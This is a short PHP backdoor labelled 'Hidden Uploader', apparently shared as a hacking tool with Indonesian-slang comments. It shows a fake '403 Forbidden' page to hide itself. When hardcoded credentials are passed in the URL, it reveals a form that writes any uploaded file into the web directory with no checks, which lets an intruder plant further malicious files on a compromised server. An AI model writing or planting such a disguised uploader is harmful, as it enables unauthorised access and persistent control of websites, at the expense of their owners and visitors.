HIDDEN UPLOADER 403 FORBIDDEN

1. <?php
2. // Hidden Uploader
3. // Anti Tikung
4. // LOL
5. echo" <title> Forbidden</title>
6. </head><body>
7. <h1>Forbidden</h1>
8.  
9. <p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
10. Server unable to read file, denying access to be safe
11. <br><br>
12. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p>";
13.  
14. if(isset($_POST['ntap']))
15. {
16. $pile = $_FILES['filecuk']['name'];
17. $piles= $_FILES['filecuk']['tmp_name'];
18. $folder="";
19. if(move_uploaded_file($piles,$folder.$pile))
20. {
21. $hasil = "Sukses !<a href='$pile' target='_blank'>Klik sini </A>";
22. }
23. else
24. {
25. $hasil = "Failed!";
26. }
27. }
28. $usercuk ="ipkcyber";//user
29. $passcuk ="npazone";//password
30. // exploit : ?user=user&pass=pasa
31. if($_GET['user']==$usercuk &&$_GET['pass']==$passcuk){
32. echo'
33. <!DOCTYPE html>
34. <html xmlns="http://www.w3.org/1999/xhtml">
35. <head>
36. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
37. <title>Hidden Uploader</title>
38. </head>
39. <body>
40. <center>
41. <h1>Hidden Uploader</h1>
42. <form action="" method="post" enctype="multipart/form-data">
43. <input type="file" name="filecuk" />
44. <input type="submit" name="ntap" value="Go !">
45. </form>
46. '.$hasil.'
47. </body>
48. </html>';
49. }
50. ?>